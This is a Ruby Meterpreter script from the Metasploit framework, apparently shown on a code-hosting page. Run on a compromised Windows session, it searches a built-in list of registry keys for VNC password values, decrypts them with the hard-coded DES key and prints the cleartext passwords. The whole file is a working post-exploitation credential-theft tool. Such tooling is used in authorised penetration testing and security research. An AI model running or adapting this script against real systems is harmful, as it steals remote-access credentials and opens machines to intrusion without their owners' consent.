metasploit-framework/scripts/meterpreter/getvncpw.rb

101 lines
2.7 KiB
Ruby

#!/usr/bin/env ruby
#----------------------------------------------------------------
# Meterpreter script to obtain the VNC password out of the
# registry and print its decoded cleartext
#
# by Kurt Grutzmacher <grutz@jingojango.net>
#
# rev history
# -----------
# 1.0 - 9/24/9 - Initial release
#----------------------------------------------------------------
require 'cipher/des'
session = client
@@exec_opts = Rex::Parser::Arguments.new(
"-h" => [ false, "Help menu."],
"-k" => [ true, "Specific registry key to search (minus Password)."],
"-l" => [ false, "List default key locations"]
)
def usage()
print("\nPull the VNC Password from a Windows Meterpreter session\n")
print("By default an internal list of keys will be searched.\n\n")
print("\t-k\tSpecific key to search (e.g. HKLM\\\\Software\\\\ORL\\\\WinVNC3\\\\Default)\n")
print("\t-l\tList default key locations\n\n")
completed
end
def get_vncpw(session, key)
root_key, base_key = session.sys.registry.splitkey(key)
open_key = session.sys.registry.open_key(root_key,base_key,KEY_READ)
begin
return open_key.query_value('Password')
rescue
# no registry key found or other error
return nil
end
end
def listkeylocations(keys)
print_line("\nVNC Registry Key Locations")
print_line("--------------------------\n")
keys.each { |key|
print_line("\t#{key}")
}
completed
end
# fixed des key
fixedkey = "\x17\x52\x6b\x06\x23\x4e\x58\x07"
# 5A B2 CD C0 BA DC AF 13
# some common places for VNC password hashes
keys = [
'HKLM\\Software\\ORL\\WinVNC3', 'HKCU\\Software\\ORL\\WinVNC3',
'HKLM\\Software\\ORL\\WinVNC3\\Default', 'HKCU\\Software\\ORL\\WinVNC3\\Default',
'HKLM\\Software\\ORL\\WinVNC\\Default', 'HKCU\\Software\\ORL\\WinVNC\\Default',
'HKLM\\Software\\RealVNC\\WinVNC4', 'HKCU\\Software\\RealVNC\\WinVNC4',
'HKLM\\Software\\RealVNC\\Default', 'HKCU\\Software\\RealVNC\\Default',
]
# parse the command line
listkeylocs = false
keytosearch = nil
@@exec_opts.parse(args) { |opt, idx, val|
case opt
when "-h"
usage
when "-l"
listkeylocations(keys)
when "-k"
keytosearch = val
end
}
if keytosearch == nil
print_status("Searching for VNC Passwords in the registry....")
keys.each { |key|
vncpw = get_vncpw(session, key)
if vncpw
vncpw_hextext = vncpw.data.unpack("H*").to_s
vncpw_text = Cipher::DES.decrypt fixedkey, vncpw.data
print_status("FOUND in #{key} -=> #{vncpw_hextext} => #{vncpw_text}")
end
}
else
print_status("Searching in regkey: #{keytosearch}")
vncpw = get_vncpw(session, keytosearch)
if vncpw
vncpw_hextext = vncpw.data.unpack("H*").to_s
vncpw_text = Cipher::DES.decrypt fixedkey, vncpw.data
print_status("FOUND in #{keytosearch} -=> #{vncpw_hextext} => #{vncpw_text}")
else
print_status("Not found")
end
end